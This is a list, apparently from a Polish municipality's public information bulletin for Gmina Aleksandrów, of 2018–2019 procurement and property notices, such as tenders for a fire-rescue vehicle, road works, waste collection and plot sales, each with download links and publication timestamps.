Wykaz nieruchomości przeznaczonych do dzierżawy
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-09-04 09:55:25 | Data modyfikacji: 2019-09-05 12:03:08.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Zakup średniego samochodu
ratowniczo-gaśniczego z napędem 4x4
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-08-30 13:50:03 | Data modyfikacji: 2019-09-05 12:26:29.
Informacja z otwarcia ofert - Zakup średniego
samochodu ratowniczo-gaśniczego z napędem 4x4
dla OSP w Dabrowie nad Czarną
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-08-19 15:55:55 | Data modyfikacji: 2019-09-05 12:26:29.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Zakup biletów miesiecznych dla uczniów
dojeżdżających do szkół w roku szkolnym
2019/2020
 
wybor_oferty_bilety_miesieczne_19082019.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-08-19 10:40:39 | Data modyfikacji: 2019-09-05 12:26:29.
Modyfikacja SIWZ - Zakup średniego samochodu
ratowniczo - gaśniczego z napędem 4x4 dla OSP w
Dąbrowie nad Czarną
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-08-14 15:37:30 | Data modyfikacji: 2019-09-05 12:26:29.
Ogłoszenie o zmianie ogłoszenia - Zakup
średniego samochodu ratowniczo - gaśniczego z
napędem 4x4 dla OSP w Dąbrowie nad Czarną
 
Dokumnet do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-08-14 15:35:17 | Data modyfikacji: 2019-09-05 12:26:29.
Wyjaśnienie treści SIWZ - Zakup średniego
samochodu ratowniczo - gaśniczego z napędem 4x4
dla OSP w Dąbrowie nad Czarną
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-08-14 15:33:51 | Data modyfikacji: 2019-09-05 12:26:29.
Informacja z otwarcia ofert - Budowa chodnika w
miejscowości Stara
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-08-12 13:50:20 | Data modyfikacji: 2019-09-05 12:26:29.
Ogłoszenie o zamówieniu - Zakup średniego
samochodu ratowniczo - gaśniczego z napędem 4x4
dla OSP w Dąbrowie nad Czarną

Ogłoszenie o zamówieniu

Załącznik Nr 1 - Szczegółowy opis przedmiotu zamówienia

SIWZ wraz z załącznikami 1-7

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-08-12 10:54:40 | Data modyfikacji: 2019-09-05 12:26:29.
Rozeznanie cenowe - zakup biletów miesięcznych
dla uczniów dojeżdżających do szkół na
terenie Gminy Aleksandrów rok 2019/20

Rozeznanie cenowe

Załącznik Nr 1 - formularz ofetowy

Załącznik Nr 2 - Wykaz ilościowy uczniów

Załącznik Nr 3 - Zestawienie cen jednostkowych

Załącznik Nr 4 - Plan tras

Załącznik Nr 5 - Wykaz sprzętu

Załącznik Nr 6 - Wykaz usług

Załącznik Nr 7 - Projekt umowy

Załącznik Nr 8 - Oświadczenie RODO

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-08-12 08:23:43 | Data modyfikacji: 2019-09-05 12:26:29.
Ogłszenie o zamówieniu - Budowa chodnika w
miejscowości Stara

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-6

Załącznik nr 7 - Dokumentacja projektowa

Załącznik nr 8 - Specyfikacja techniczna

Załącznik Nr 9 - Przedmiar

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-07-26 15:12:22 | Data modyfikacji: 2019-07-26 15:51:07.
Zapytanie ofertowe - usługa konserwacji
oświetlenia ulicznego na terenie gminy
Aleksandrów
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-07-01 09:52:29 | Data modyfikacji: 2019-07-26 15:51:07.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Przebudowa drogi powiatowej Nr DP1502E Sulejów
-Kawęczyn -Krasiek
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-06-21 13:42:12 | Data modyfikacji: 2019-07-26 15:51:07.
Zawiadomienie o wyborze najkorzystniejszej oferty
- odbiór i zagospodarowanie odpadów komunalnych
z terenu gminy Aleksandrów
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-06-21 13:39:56 | Data modyfikacji: 2019-06-21 13:42:55.
Zapytanie ofertowe - udzielenie kredytu
długoterminowego
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-06-18 17:00:01 | Data modyfikacji: 2019-06-21 13:42:55.
Zapytanie ofertowe o cenę kruszywa drogowego
dolomitowo - węglanowego
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-06-13 10:18:51 | Data modyfikacji: 2019-06-21 13:42:55.
Informacja z otwarcia ofert - Odbiór i
zagospodarowanie odpadów komunalnych z terenu
gminy Aleksandrów
 
Dokumnet do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-05-22 17:54:52 | Data modyfikacji: 2019-06-21 13:42:55.
Ogłoszenie o przetargu ustnym nieograniczonym na
sprzedaż nieruchomości niezabudowanej w
Dąbrowie nad Czarną
 
Dokumnet do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-05-15 14:22:46 | Data modyfikacji: 2019-06-21 13:42:55.
Ogłoszenie o zamówieniu - Odbiór i
zagospodarowanie odpadów komunalnych z terenu
gminy Aleksandrów

Ogłoszenie o przetargu

SIWZ wraz z załacznikami 1-7

Załącznik Nr 8

Załącznik Nr 9

Załacznik Nr 10

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-05-13 16:00:30 | Data modyfikacji: 2019-06-21 13:42:55.
Informacja z otwarcia ofert - Przebudowa drogi
powiatowej Nr DP1502E Sulejów - Kawęczyn -
Krasik na odcinku Kawęczyn - Aleksandrów
 
Dokumnet do pobrania tutaj >.

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-05-08 12:33:45 | Data modyfikacji: 2019-06-21 13:42:55.
Zawiadomienie o unieważnieniu postępowania -
Odbiór i zagospodarowanie odpadów komunalnych z
terenu gminy Aleksandrów
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-04-30 14:15:16 | Data modyfikacji: 2019-06-21 13:42:55.
Informacja z otwarcia ofert - Odbiór i
zagospodarowanie odpadów komunalnych z terenu
gminy Aleksandrów
 
Dokumnet do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-04-29 15:26:47 | Data modyfikacji: 2019-06-21 13:42:55.
Odbiór i zagospodarowanie odpadów komunalnych z
terenu Gminy Aleksandrów

Ogłoszenie o prztargu

SIWZ wraz z załącznikami 1-7

Załącznik Nr 8

Załącznik Nr 9

Załącznik Nr 10

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-04-18 10:38:16 | Data modyfikacji: 2019-06-21 13:42:55.
Przebudowa (remont) drogi powiatowej Nr DP1502E
Sulejów - Kawęczyn - Krasik na odcinku Kawęczyn
- Aleksandrów

Ogłoszenie o zamówieniu

SIWZ wraz z załacznikami 1-7

Załącznik Nr 8 - Projekt

Załącznik Nr 9 - STWiOR

Załącznik Nr 10 - Przedmiar

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-04-16 11:44:12 | Data modyfikacji: 2019-06-21 13:42:55.
Zapytanie ofertowe - dostawa destruktu asfaltowego
na teren gminy Aleksandrów
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-02-27 11:45:32 | Data modyfikacji: 2019-06-21 13:42:55.
Zapytanie ofertowe - dostawa kruszywa drogowego
dolomitowo - węglanowego o frakcji 0-31,5 mm na
teren gminy Aleksandrów
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-02-27 11:43:56 | Data modyfikacji: 2019-06-21 13:42:55.
Ogłoszenie o przetargu ustnym nieograniczonym na
sprzedaż nieruchomości niezabudowanej w
Dąbrowie nad Czarną
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-02-05 12:53:50 | Data modyfikacji: 2019-06-21 13:42:55.
Plan postępowań o udzielenie zamówień w 2019
roku
 
Plan_postepowan_2019.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-01-22 09:35:54 | Data modyfikacji: 2019-06-21 13:42:55.
Zapytanie ofertowe - zakup paliwa do autobusu
szkolnego w 2019 i 2020 roku
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-12-12 10:51:25 | Data modyfikacji: 2019-06-21 13:42:55.
Zapytanie ofertowe - stoły dla potrzeb świetlicy
wiejskiej w Dąbrowie nad Czarną
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-12-12 10:03:23 | Data modyfikacji: 2019-06-21 13:42:55.
Zapytanie ofertowe - sprzęt RTV dla Gminnego
Centrum Kultury w Starej
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-12-07 12:44:49 | Data modyfikacji: 2019-06-21 13:42:55.
Zapytanie ofertowe - dotyczy zakupu mebli dla
Gminnego Centrum Kultury w Starej
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-12-07 12:42:15 | Data modyfikacji: 2019-06-21 13:42:55.
Zapytanie ofertowe - Gry edukacyjne i maty do
ćwiczeń
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-12-07 12:38:43 | Data modyfikacji: 2019-06-21 13:42:55.
Zapytanie ofertowe - usługi koparko - ładowarką
oraz samochodem samowyładowczym
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-11-27 10:11:49 | Data modyfikacji: 2019-06-21 13:42:55.
Ogłoszenie o przetargu na sprzedaż działki w
Dąbrowie nad Czarną
 
przetarg_dzialka_Daborwa_192_1_30102018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-10-30 14:40:31 | Data modyfikacji: 2019-06-21 13:42:55.
Zapytanie ofertowe - 60 ton pelletu drzewnego na
potrzeby Szkoły Podstawowej w Dąbrowie nad
Czarną
 
Zapytanie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-10-05 08:22:27 | Data modyfikacji: 2019-06-21 13:42:55.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Dostawa oleju opałowego dla Urzędu Gminy,
Ośrodka Zdrowia i Szkół
 
Dokument do pobrania tutaj>>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-10-04 14:42:21 | Data modyfikacji: 2019-06-21 13:42:55.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Budowa infrastruktury rekreacyjnej w
miejscowości Wólka Skotnicka
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-10-03 15:21:05 | Data modyfikacji: 2019-06-21 13:42:55.
Unieważnienie postępowania - Przebudowa drogi Nr
3921E Przedbórz -Błogie Szlacheckie w zakresie
utwardzenia pobocza w miejscowości Dębowa Góra
Kolonia
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-10-03 15:10:16 | Data modyfikacji: 2019-06-21 13:42:55.
Wykaz nieruchomości przeznaczonych do dzierżawy
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-09-25 09:17:37 | Data modyfikacji: 2018-09-25 09:48:37.
Informacja z otwarcia ofert - Dostawa oleju
opałowego dla Urzędu Gminy, Ośrodka Zdrowia i
Szkół na terenie gminy Aleksandrów
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-09-19 12:11:21 | Data modyfikacji: 2018-09-19 12:12:35.
Informacja z otwarcia ofert - Budowa
infrastruktury rekreacyjnej w miejscowości Wólka
Skotnicka
 
otwarcie_ofert_silownia_wolka_skotnicka_17092018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-09-17 13:12:02 | Data modyfikacji: 2018-09-19 12:12:35.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Zagospodarowanie przestrzeni publicznej w
miejscowości Rożenek
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-09-14 13:50:33 | Data modyfikacji: 2018-09-19 12:12:35.
Ogłoszenie o zamówieniu - Przebudowa drogi
powiatowej Nr 3921E Przedbórz - Błogie
Szlacheckie w zakresie utwardzenia pobocza w
miejscowości Dębowa Góra Kolonia

Ogłoszenie o zamówieniu

SIWZ wraz załącznikami 1-6

Załącznik Nr 7 - dokumentacja projektowa

Załącznik Nr 8 - STWiOR

Załącznik Nr 9 - przedmiar robót

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-09-13 09:35:46 | Data modyfikacji: 2018-09-19 12:12:35.
Ogłoszenie o przetargu - sprzedaż działki nr
192/2 w Dąbrowie nad Czarną
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-09-12 09:43:20 | Data modyfikacji: 2018-09-19 12:12:35.
Ogłoszenie o przetargu - sprzedaż działki nr
192/1 w Dąbrowie nad Czarną
 
Dokument do pobranita tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-09-12 09:41:21 | Data modyfikacji: 2018-09-19 12:12:35.
Ogłoszenie o zamówieniu - Dostawa oleju
opałowego dla Urzędu Gminy, Ośrodka Zdrowia i
Szkół na terenie gminy Aleksandrów w sezonie
2018/2019

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami.

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-09-11 09:20:03 | Data modyfikacji: 2018-09-19 12:12:35.
Ogłoszenie o zamienie ogłoszenia - Budowa
infrastruktury rekreacyjnej w miejscowości Wólka
Skotnicka, nr postępowania: 271.15.2018 -
AKTUALIZACJA!!!

Ogłoszenie o zmianie ogłoszenia

Załącznik Nr 1 do SIWZ po zmianach - do edycji

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-09-10 09:34:34 | Data modyfikacji: 2018-09-13 08:35:02.
Modyfikacja SIWZ - Budowa infrastruktury
rekreacyjnej w miejscowości Wólka Skotnicka, nr
postępowania: 271.15.2018
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-09-10 09:32:48 | Data modyfikacji: 2018-09-13 08:35:02.
Ogłoszenie o zamówieniu - Budowa infrastrukury
rekreacyjnej w miejscowości Wólka Skotnicka

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-5

Załącznik Nr 6 - dokumentacja projektowa

Załącznik Nr 7 - STWiOR

Załącznik Nr 8 - przedmiar

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-08-30 12:18:02 | Data modyfikacji: 2018-09-13 08:35:02.
Zawiadomienie o unieważnieniu postępowania -
Budowa infrastrukury rekreacyjnej w miejscowości
Wólka Skotnicka
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-08-09 07:30:33 | Data modyfikacji: 2018-09-13 08:35:02.
Informacja z otwarcia ofert - Zagospodarowanie
przestrzeni publicznej w miejscowości Rożenek
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-08-09 07:27:52 | Data modyfikacji: 2018-09-13 08:35:02.
Ogłoszenie o przetargu - działka położona w
Dąbrowie nad Czarną
 
przetarg_dzialka_Dabrowa_192-2_07082018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-08-07 12:27:14 | Data modyfikacji: 2018-09-13 08:35:02.
Ogłoszenie o przetargu - działka położona w
Dąbrowie nad Czarną
 
przetarg_dzialka_Dabrowa_192-1_07082018_.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-08-07 12:26:10 | Data modyfikacji: 2018-09-13 08:35:02.
Otwacier ofert - Budowa infrastrukury rekreacyjnej
w miejscowości Wólka Skotnicka
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-08-07 12:14:23 | Data modyfikacji: 2018-09-13 08:35:02.
Ogłoszenie o zamówieniu - Zagospodarowanie
przestrzeni publicznej w miejscowości Rożenek

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-5

Załącznik Nr 6 - dokumentacja projektowa

Załącznik Nr 7 - SST

Załącznik Nr 8 - przedmiar

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-07-24 11:45:51 | Data modyfikacji: 2018-09-13 08:35:02.
Ogłoszenie o zamówieniu - Budowa infrastruktury
rekreacyjnej w miejscowości Wolka Skotnicka

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-5

Załącznik nr 6 - dokumentacja projektowa

Załącznik nr 7 - STWiOR

Załącznik Nr 8 - przedmiar

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-07-20 13:35:48 | Data modyfikacji: 2018-09-13 08:35:02.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Udzielenie i obsługa kredytu długoterminowego
dla Gminy Aleksandrów w kwocie 1.615.000,00
zł...
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-07-17 09:32:38 | Data modyfikacji: 2018-09-13 08:35:02.
Zawiadomienie o wyborze oferty: Rozbudowa i
przebudowa budynku OSP w Niewierszynie
 
Dokument do pobrania tutaj>>

Opublikowane przez: Bartosz Lewandowski | Data wprowadzenia: 2018-07-04 09:12:35 | Data modyfikacji: 2018-09-13 08:35:02.
Zawiadomienie o wyborze oferty: Budowa
infrastruktury sportowo-rekreacyjnej w
miejscowości Skotniki
 
Dokument do pobrania tutaj>>

Opublikowane przez: Bartosz Lewandowski | Data wprowadzenia: 2018-07-04 09:08:29 | Data modyfikacji: 2018-09-13 08:35:02.
Informacja z otwarcia ofert: Udzielenie i obsługa
kredytu długoterminowego dla Gminy Aleksandrów w
kwocie 1.615.000,00 zł
 
Dokument do pobrania tutaj>>

Opublikowane przez: Bartosz Lewandowski | Data wprowadzenia: 2018-07-03 13:38:29 | Data modyfikacji: 2018-09-13 08:35:02.
Wyjaśnienie SIWZ: Udzielenie i obsługa kredytu
długoterminowego dla Gminy Aleksandrów w kwocie
1.615.000,00 zł
 
Dokumenty do pobrania>>

Opublikowane przez: Bartosz Lewandowski | Data wprowadzenia: 2018-06-27 11:08:21 | Data modyfikacji: 2018-06-27 11:13:24.
Wyjaśnienie SIWZ: Udzielenie i obsługa kredytu
długoterminowego dla Gminy Aleksandrów w kwocie
1.615.000,00 zł
 
Dokument do pobrania tutaj>>

Opublikowane przez: Bartosz Lewandowski | Data wprowadzenia: 2018-06-27 11:04:00 | Data modyfikacji: 2018-06-27 11:10:06.
Informacja z otwarcia ofert - Rozbudowa i
przebudowa budynku OSP w Niewierszynie
 
Dokument do pobrania tutaj>>

Opublikowane przez: Bartosz Lewandowski | Data wprowadzenia: 2018-06-26 12:13:17 | Data modyfikacji: 2018-06-27 11:10:06.
Informacja z otwarcia ofert - Budowa
infrastruktiry sportowo - rekreacyjnej w
miejscowości Skotniki
 
Dokument do pobrania tutaj>>

Opublikowane przez: Bartosz Lewandowski | Data wprowadzenia: 2018-06-26 12:08:45 | Data modyfikacji: 2018-06-27 11:10:06.
Ogłoszenie o zamówieniu - Udzielenie i obsługa
kredytu długoterminowego dla Gminy Aleksandrów w
kwocie 1.615.000,00zł

Ogłoszenie o zamówieniu

SIWZ z załącznikami

 

Opublikowane przez: Bartosz Lewandowski | Data wprowadzenia: 2018-06-22 11:57:05 | Data modyfikacji: 2018-06-22 12:02:18.
Ogłoszenie o zamówieniu - Rozbudowa i przebudowa
budynku OSP w Nierwierszynie

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-6

Załącznik Nr 7

Załącznik Nr 8 - STWIOR

Załącznik Nr 9 - Przedmiar

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-06-11 13:42:45 | Data modyfikacji: 2018-06-22 12:02:18.
Ogłoszenie o przetargu - Budowa infrastruktury
sportowo-rekreacyjnej w Skotnikach

Ogłoszenie o zamówieniu

SIWZ wraz załącznikami 1-5

Załącznik Nr 6 - Dokumentacja projektowa

Załącznik Nr 7 - Specyfikacja

Załącznik Nr 8 - Przedmiar

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-06-11 11:52:08 | Data modyfikacji: 2018-06-22 12:02:18.
Ogłoszenie o przetargu - działka położona w
Dąbrowie nad Czarną
 
ogloszenie_o_przetargu_dzialka_192_2_dabrowa_05062018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-06-05 15:28:55 | Data modyfikacji: 2018-06-22 12:02:18.
Ogłoszenie o przetargu - działka położona w
Dąbrowie nad Czarną
 
ogloszenie_o_przetargu_dzialka_192_1_dabrowa_05062018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-06-05 15:27:58 | Data modyfikacji: 2018-06-22 12:02:18.
Zapytanie ofertowe - Usługa pełnienia
kompleksowego nadzoru inwestorskiego zadania pn.
Budowa sali gminastycznej przy Szkole podstawowej
im. T. Kościuszki w Aleksandrowie
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-06-01 10:07:22 | Data modyfikacji: 2018-06-22 12:02:18.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Przebudowa budynku OSP w miejscowości Stara z
przeznaczeniem na świetlicę wiejską w ramach
projektu pn. "Poprawa infrastruktury dla potrzeb
aktywności artystycznej i kulturalnej w Gminie
Aleksandrów poprzez przebudowę i rozbudowę
budynku Gminnego Centrum Kultury w miejscowości
Stara"
 
wybor_oferty_OSP_Stara_28052018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-05-28 13:03:19 | Data modyfikacji: 2018-06-22 12:02:18.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Budowa świetlicy wiejskiej w miejscowości
Dąbrowa nad Czarną
 
wybor_oferty_swietlica_dabrowa_28052018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-05-28 13:01:40 | Data modyfikacji: 2018-06-22 12:02:18.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Budowa sali gimnastycznej przy Szkole
podstawowej im. T. Kościuszki w Aleksandrowie
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-05-25 12:14:53 | Data modyfikacji: 2018-05-25 12:16:25.
Wykaz nieruchomości przeznaczonych do dzierżawy
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-05-18 13:51:13 | Data modyfikacji: 2018-05-25 12:16:25.
Informacja z otwarcia ofert - Budowa świetlicy
wiejskiej w miejscowości Dąbrowa nad Czarną
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-05-14 12:52:58 | Data modyfikacji: 2018-05-25 12:16:25.
Unieważnienie postępowania - Rozbudowa i
przebudowa budynku OSP w Niewierszynie
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-05-14 12:50:48 | Data modyfikacji: 2018-05-25 12:16:25.
Obwieszczenie Wójta Gminy Aleksandrów o wydaniu
decyzji umarzającej postępowanie w sprawie
wydania decyzji o środowiskowych uwarunkowaniach
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-05-08 15:56:56 | Data modyfikacji: 2018-05-25 12:16:25.
Informacja z otwarcia ofert - Rozbudowa i
przebudowa budynku OSP w Niewierszynie
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-05-08 13:40:32 | Data modyfikacji: 2018-05-25 12:16:25.
Zawiadomienie o uniewżnieniu postepowania
-"Przebudwowa drogi powiatowej Nr 3921E Przedbórz
- Błogie Szlacheckie w zakresie utwardzenia
pobocza w miejscowości Dębowa Góra Kolonia".
 
Dokument do pobrania tutaj>>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-05-08 08:59:01 | Data modyfikacji: 2018-05-25 12:16:25.
Ogłoszenie o zmianie ogłoszenia - Budowa
świetlicy wiejskiej w miejscowości Dąbrowa nad
Czarną
 
Ogloszenie_o_zmianie_ogloszenia_swietlica_daborwa_02052018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-05-02 14:08:25 | Data modyfikacji: 2018-05-25 12:16:25.
Modyfikacja SIWZ - Budowa świetlicy wiejskiej w
miejscowości Dąbrowa nad Czarną

Modyfikacja SIWZ

Aktualny załącznik nr 7

Aktualny załącznik nr 9

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-05-02 13:58:22 | Data modyfikacji: 2018-05-25 12:16:25.
Informacja z otwarcia ofert - Przebudowa budynku
OSP w miejscowości Stara z przeznaczeniem na
świetlicę wiejską w ramach projektu pn.
"Poprawa infrastruktury dla potrzeb aktywności
artystycznej i kulturalnej w Gminie Aleksandrów
poprzez przebudowę i rozbudowę budynku Gminnego
Centrum Kultury w miejscowości Stara"
 
Otwarcie_ofert_OSP_Stara_26042018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-04-26 15:27:09 | Data modyfikacji: 2018-05-25 12:16:25.
Modyfikacja SIWZ - Przebudowa drogi powiatowej Nr
3921E Przedbórz - Błogie Szlacheckie w zakresie
utwardzenia pobocza w miejscowości Dębowa Góra
Kolonia
 
modyfikaja_SIWZ_droga_Debowa_Gora_Kol_25042018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-04-25 12:06:47 | Data modyfikacji: 2018-04-25 12:08:18.
Ogłoszenie o zamówieniu: Rozbudowa i przebudowa
budynku OSP w Niewierszynie

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-6

Załącznik Nr 7

Załącznik Nr 8 - STWiOR

Załącznik Nr 9 - przedmiar

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-04-23 14:06:55 | Data modyfikacji: 2018-04-23 14:07:51.
Ogłoszenie o zamówieniu - Budowa świetlicy
wiejskiej w miejscowości Dąbrowa nad Czarną

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-6

Załącznik Nr 7

Załącznik Nr 8

Załącznik Nr 9

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-04-23 11:33:30 | Data modyfikacji: 2018-04-23 14:07:51.
Ogłoszenie o zamówieniu - Przebudowa drogi
powiatowej Nr 3921E Przedbórz - Błogie
Szlacheckie w zakresie utwardzenia pobocza w
miejscowości Dębowa Góra Kolonia

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-6

Załącznik nr 7 - dokumentacja projektowa

Załącznik Nr 8 - STWiOR

Załącznik Nr 9 - przedmiar robót

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-04-20 13:08:49 | Data modyfikacji: 2018-04-23 14:07:51.
Wykaz nieruchomości przeznaczonych do sprzedaży
- Dąbrowa nad Czarną
 
nieruchomosc_dabrowa_192_2_18042018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-04-18 15:00:36 | Data modyfikacji: 2018-04-23 14:07:51.
Wykaz nieruchomości przeznaczonych do sprzedaży
- Dąbrowa nad Czarną
 
nieruchomosc_dabrowa_192_1_18042018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-04-18 14:59:11 | Data modyfikacji: 2018-04-23 14:07:51.
Modyfikacja SIWZ - Przebudowa budynku OSP w
miejscowości Stara z przeznaczeniem na
świetlicę wiejską w ramach projektu pn.
"Poprawa infrastruktury dla potrzeb aktywności
artystycznej i kulturalnej w Gminie Aleksandrów
poprzez przebudowę i rozbudowę budynku Gminnego
Centrum Kultury w miejscowości Stara"
 
modyfikacja_SIWZ_OSP_Stara_13042018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-04-13 11:57:31 | Data modyfikacji: 2018-04-23 14:07:51.
Informacja z otwarcia ofert - Budowa sali
gimnastycznej przy Szkole podstawowej im. T.
Kościuszki w Aleksandrowie
 
Otwarcie_ofert_sala_aleksandrow_12042018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-04-12 14:11:14 | Data modyfikacji: 2018-04-23 14:07:51.
Ogłoszenie o zamówieniu - Przebudowa budynku OSP
w miejscowości Stara z przeznaczeniem na
świetlicę wiejską w ramach projektu pn.
"Poprawa infrastruktury dla potrzeb aktywności
artystycznej i kulturalnej w Gminie Aleksandrów
poprzez przebudowę i rozbudowę budynku Gminnego
Centrum Kultury w miejscowości Stara"

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-6

Załącznik Nr 7 - Dokumentacja projektowa

Załącznik Nr 8 - STWiOR

Załącznik Nr 9 - przedmiary

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-04-11 15:06:17 | Data modyfikacji: 2018-04-11 15:21:16.
Zawiadomienie o unieważnieniu postepowania -
Rozbudowa i przebudowa budynku OSP w Niewierszynie
 
uniewznienie_postepowania_OSP_niewierszyn_30032018.pdf

